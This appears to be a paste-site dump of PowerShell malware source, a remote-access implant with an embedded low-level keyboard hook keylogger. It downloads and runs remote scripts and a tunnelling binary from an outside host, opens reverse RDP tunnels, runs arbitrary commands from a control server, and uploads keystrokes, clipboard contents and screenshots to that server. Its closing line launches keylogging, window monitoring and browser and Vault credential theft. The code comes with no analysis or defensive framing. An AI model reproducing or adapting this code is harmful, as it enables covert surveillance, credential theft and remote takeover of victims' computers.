- else { & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');" }
- }
- # +rdp username;password;trigger-port;10.0.0.1
- elseif ($cmd.StartsWith("+rdp", 1)) {
- $creds = ($cmd.split(' '))[1]
- $plink_username = ($creds.split(';'))[0]
- $plink_password = ($creds.split(';'))[1]
- $plink_trigger_port = ($creds.split(';'))[2]
- $plink_ip = ($creds.split(';'))[3]
- $plink_username, $plink_password, $plink_trigger_port, $plink_ip
- Start-Job -ScriptBlock {
- #IF ((Test-Path "$env:temp\plink.exe") -eq $False) { (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/x86/plink.exe', "$env:temp\plink.exe");}
- IF ((Test-Path "$env:temp\stnlc.exe") -eq $False)
- {
- (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/stnlc.bin', "$env:temp\stnlc.exe")
- (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/CiWinCng32.dll', "$env:temp\CiWinCng32.dll")
- }
- $plink_username = $args[0]
- $plink_password = $args[1]
- $plink_trigger_port = $args[2]
- $plink_ip = $args[3]
- Stop-Process -name stnlc -ErrorAction SilentlyContinue
- #& cmd /c "echo yes | $env:temp\plink.exe -R "+$plink_trigger_port+":127.0.0.1:3389 -l $plink_username -pw $plink_password $plink_ip -N" } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip }
- & cmd /c "echo S | $env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password"
- & cmd /c "$env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password -unat=y"
- } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip }
- elseif ($cmd -ne '') { Start-Job -ScriptBlock {& cmd /c $args[0]} -ArgumentList $cmd
- Write-Host $args[0]
- }}}
- $WebGetTimer = 1200
- Start-Sleep -Seconds $WebGetTimer
- }
- } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
- }
- function PostFile($file_name) {
- $name = (Get-ChildItem $file_name).name
- $bytes = [System.IO.File]::ReadAllBytes($file_name)
- $enc = [System.Text.Encoding]::GetEncoding($codePageName)
- $data = $enc.GetString($bytes)
- [System.Net.WebRequest]$webRequest = [System.Net.WebRequest]::Create($params.url+'/pshscr')
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- $webRequest.ContentType = "image/jpeg"
- $webRequest.Method = "POST"
- [byte[]]$bytes = $enc.GetBytes($data);
- $webRequest.ContentLength = $bytes.Length;
- $webRequest.Headers.add('content-disposition', "file=$name")
- $webRequest.Headers.add('hashid', $params.hashid)
- $webRequest.Headers.add('computer_name', $params.computer_name)
- $webRequest.Headers.add('domain', $params.domain)
- $webRequest.Headers.add('username', $params.username)
- [System.IO.Stream]$reqStream = $webRequest.GetRequestStream()
- $reqStream.Write($bytes, 0, $bytes.Length);
- $reqStream.Flush();
- $resp = $webRequest.GetResponse();
- $rs = $resp.GetResponseStream();
- [System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $rs;
- $sr.ReadToEnd();
- }
- function WebPost {
- $pshlog_url = $params.url+"/pshlog"
- while ($true) {
- $WebPostTimer = 1200
- Start-Sleep -Seconds $WebPostTimer
- Write-host $params.log_file
- If (Test-Path $log_file) {
- #$content = [IO.File]::ReadAllText($params.log_file)
- $aaa = Get-Content $params.log_file
- $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa))
- $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "keylog"}
- $log_json = $json | ConvertTo-Json
- Write-Host $log_json
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($pshlog_url)
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- Remove-Item $log_file
- }
- if (Test-Path "$env:Temp\Applnsights_VisualStudio.txt") {
- $clipfile = "$env:Temp\Applnsights_VisualStudio.txt"
- $aaa = Get-Content $clipfile | Out-String
- $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa))
- $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "clipboard"}
- $log_json = $json | ConvertTo-Json
- write-host $log_json
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("$pshlog_url")
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- Remove-Item $clipfile
- }
- $directoryInfo = Get-ChildItem $ScreenshotPath
- If ($directoryInfo) {
- $directoryInfo | ForEach-Object {
- Write-Host $_.FullName
- PostFile($_.FullName)
- Remove-Item $_.FullName
- }
- }
- }
- }
- function Get-Keystrokes {
- <#
- .SYNOPSIS
- .PARAMETER LogPath
- Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log.
- .PARAMETER Timeout
- Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely.
- .PARAMETER PassThru
- Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes.
- .EXAMPLE
- Get-Keystrokes -LogPath C:\key.log
- .EXAMPLE
- Get-Keystrokes -Timeout 20
- .LINK
- http://www.obscuresec.com/
- http://www.exploit-monday.com/
- https://github.com/secabstraction
- https://github.com/ahhh/PSSE
- #>
- [CmdletBinding()]
- Param (
- [Parameter(Position = 0)]
- [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})]
- [String]$LogPath = "$($env:TEMP)\key.log",
- [Parameter(Position = 1)]
- [Double]$Timeout,
- [Parameter()]
- [Switch]$PassThru
- )
- $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)
- try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode }
- catch { throw $_ }
- $Script = {
- Param (
- [Parameter(Position = 0)]
- [String]$LogPath,
- [Parameter(Position = 1)]
- [Double]$Timeout
- )
- function local:Get-DelegateType {
- Param (
- [OutputType([Type])]
- [Parameter( Position = 0)]
- [Type[]]
- $Parameters = (New-Object Type[](0)),
- [Parameter( Position = 1 )]
- [Type]
- $ReturnType = [Void]
- )
- $Domain = [AppDomain]::CurrentDomain
- $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
- $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
- $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
- $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
- $MethodBuilder.SetImplementationFlags('Runtime, Managed')
- $TypeBuilder.CreateType()
- }
- function local:Get-ProcAddress {
- Param (
- [OutputType([IntPtr])]
- [Parameter( Position = 0, Mandatory = $True )]
- [String]
- $Module,
- [Parameter( Position = 1, Mandatory = $True )]
- [String]
- $Procedure
- )
- # Get a reference to System.dll in the GAC
- $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
- Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
- $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
- # Get a reference to the GetModuleHandle and GetProcAddress methods
- $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
- $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
- # Get a handle to the module specified
- $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- $tmpPtr = New-Object IntPtr
- $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
- # Return the address of the function
- $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
- }
- #region Imports
- [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')
- # SetWindowsHookEx
- $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA
- $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr])
- $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate)
- # CallNextHookEx
- $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx
- $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr])
- $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate)
- # UnhookWindowsHookEx
- $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx
- $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void])
- $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate)
- # PeekMessage
- $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA
- $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void])
- $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate)
- # GetAsyncKeyState
- $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState
- $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16])
- $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate)
- # GetForegroundWindow
- $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow
- $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr])
- $GetForegroundWindow = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate)
- # GetWindowText
- $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA
- $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], [Int32]) ([Void])
- $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate)
- # GetModuleHandle
- $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
- $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
- $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
- #endregion Imports
- $CallbackScript = {
- Param (
- [Parameter()]
- [Int32]$Code,
- [Parameter()]
- [IntPtr]$wParam,
- [Parameter()]
- [IntPtr]$lParam
- )
- $Keys = [Windows.Forms.Keys]
- $MsgType = $wParam.ToInt32()
- # Process WM_KEYDOWN & WM_SYSKEYDOWN messages
- if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) {
- $hWindow = $GetForegroundWindow.Invoke()
- $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey)
- if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true }
- else { $Shift = $false }
- $Caps = [Console]::CapsLock
- # Read virtual-key from buffer
- $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam)
- # Parse virtual-key
- if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters
- if ($Shift -xor $Caps) { $Key = $vKey.ToString() }
- else { $Key = $vKey.ToString().ToLower() }
- }
- elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters
- switch ($vKey.value__) {
- 96 { $Key = '0' }
- 97 { $Key = '1' }
- 98 { $Key = '2' }
- 99 { $Key = '3' }
- 100 { $Key = '4' }
- 101 { $Key = '5' }
- 102 { $Key = '6' }
- 103 { $Key = '7' }
- 104 { $Key = '8' }
- 105 { $Key = '9' }
- 106 { $Key = "*" }
- 107 { $Key = "+" }
- 108 { $Key = "|" }
- 109 { $Key = "-" }
- 110 { $Key = "." }
- 111 { $Key = "/" }
- }
- }
- elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) {
- if ($Shift) {
- switch ($vKey.value__) { # Shiftable characters
- 48 { $Key = ')' }
- 49 { $Key = '!' }
- 50 { $Key = '@' }
- 51 { $Key = '#' }
- 52 { $Key = '$' }
- 53 { $Key = '%' }
- 54 { $Key = '^' }
- 55 { $Key = '&' }
- 56 { $Key = '*' }
- 57 { $Key = '(' }
- 186 { $Key = ':' }
- 187 { $Key = '+' }
- 188 { $Key = '<' }
- 189 { $Key = '_' }
- 190 { $Key = '>' }
- 191 { $Key = '?' }
- 192 { $Key = '~' }
- 219 { $Key = '{' }
- 220 { $Key = '|' }
- 221 { $Key = '}' }
- 222 { $Key = '<Double Quotes>' }
- }
- }
- else {
- switch ($vKey.value__) {
- 48 { $Key = '0' }
- 49 { $Key = '1' }
- 50 { $Key = '2' }
- 51 { $Key = '3' }
- 52 { $Key = '4' }
- 53 { $Key = '5' }
- 54 { $Key = '6' }
- 55 { $Key = '7' }
- 56 { $Key = '8' }
- 57 { $Key = '9' }
- 186 { $Key = ';' }
- 187 { $Key = '=' }
- 188 { $Key = ',' }
- 189 { $Key = '-' }
- 190 { $Key = '.' }
- 191 { $Key = '/' }
- 192 { $Key = '`' }
- 219 { $Key = '[' }
- 220 { $Key = '\' }
- 221 { $Key = ']' }
- 222 { $Key = '<Single Quote>' }
- }
- }
- }
- else {
- switch ($vKey) {
- $Keys::F1 { $Key = '<F1>' }
- $Keys::F2 { $Key = '<F2>' }
- $Keys::F3 { $Key = '<F3>' }
- $Keys::F4 { $Key = '<F4>' }
- $Keys::F5 { $Key = '<F5>' }
- $Keys::F6 { $Key = '<F6>' }
- $Keys::F7 { $Key = '<F7>' }
- $Keys::F8 { $Key = '<F8>' }
- $Keys::F9 { $Key = '<F9>' }
- $Keys::F10 { $Key = '<F10>' }
- $Keys::F11 { $Key = '<F11>' }
- $Keys::F12 { $Key = '<F12>' }
- $Keys::Snapshot { $Key = '<Print Screen>' }
- $Keys::Scroll { $Key = '<Scroll Lock>' }
- $Keys::Pause { $Key = '<Pause/Break>' }
- $Keys::Insert { $Key = '<Insert>' }
- $Keys::Home { $Key = '<Home>' }
- $Keys::Delete { $Key = '<Delete>' }
- $Keys::End { $Key = '<End>' }
- $Keys::Prior { $Key = '<Page Up>' }
- $Keys::Next { $Key = '<Page Down>' }
- $Keys::Escape { $Key = '<Esc>' }
- $Keys::NumLock { $Key = '<Num Lock>' }
- $Keys::Capital { $Key = '<Caps Lock>' }
- $Keys::Tab { $Key = '<Tab>' }
- $Keys::Back { $Key = '<Backspace>' }
- $Keys::Enter { $Key = '<Enter>' }
- $Keys::Space { $Key = '< >' }
- $Keys::Left { $Key = '<Left>' }
- $Keys::Up { $Key = '<Up>' }
- $Keys::Right { $Key = '<Right>' }
- $Keys::Down { $Key = '<Down>' }
- $Keys::LMenu { $Key = '<Alt>' }
- $Keys::RMenu { $Key = '<Alt>' }
- $Keys::LWin { $Key = '<Windows Key>' }
- $Keys::RWin { $Key = '<Windows Key>' }
- $Keys::LShiftKey { $Key = '<Shift>' }
- $Keys::RShiftKey { $Key = '<Shift>' }
- $Keys::LControlKey { $Key = '<Ctrl>' }
- $Keys::RControlKey { $Key = '<Ctrl>' }
- $Keys::MouseClick { $Key = '<LMouse>' }
- }
- }
- # Get foreground window's title
- $Title = New-Object Text.Stringbuilder 256
- $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity)
- # Define object properties
- $Props = @{
- Key = $Key
- Time = [DateTime]::Now
- Window = $Title.ToString()
- }
- $obj = New-Object psobject -Property $Props
- # Hack since Export-CSV doesn't have an append switch in PSv2
- $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1]+'[]nl'
- #Invoke-WebRequest -uri "http://45.79.173.232:9002/log" -Method POST -Body $JSON
- Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode
- }
- return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam)
- }
- # Cast scriptblock as LowLevelKeyboardProc callback
- $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr])
- $Callback = $CallbackScript -as $Delegate
- # Get handle to PowerShell for hook
- $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName
- $ModuleHandle = $GetModuleHandle.Invoke($PoshModule)
- # Set WM_KEYBOARD_LL hook
- $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0)
- $Stopwatch = [Diagnostics.Stopwatch]::StartNew()
- while ($true) {
- if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break }
- $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0)
- Start-Sleep -Milliseconds 10
- }
- $Stopwatch.Stop()
- # Remove the hook
- $UnhookWindowsHookEx.Invoke($Hook)
- }
- # Setup KeyLogger's runspace
- $PowerShell = [PowerShell]::Create()
- [void]$PowerShell.AddScript($Script)
- [void]$PowerShell.AddArgument($LogPath)
- if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) }
- # Start KeyLogger
- [void]$PowerShell.BeginInvoke()
- if ($PassThru.IsPresent) { return $PowerShell }
- }
- Get-Keystrokes; Title-Monitor; WebGet; GetChrome; GetFF; GetVault; Gclip; WebPost
Add Comment
Please, Sign In to add comment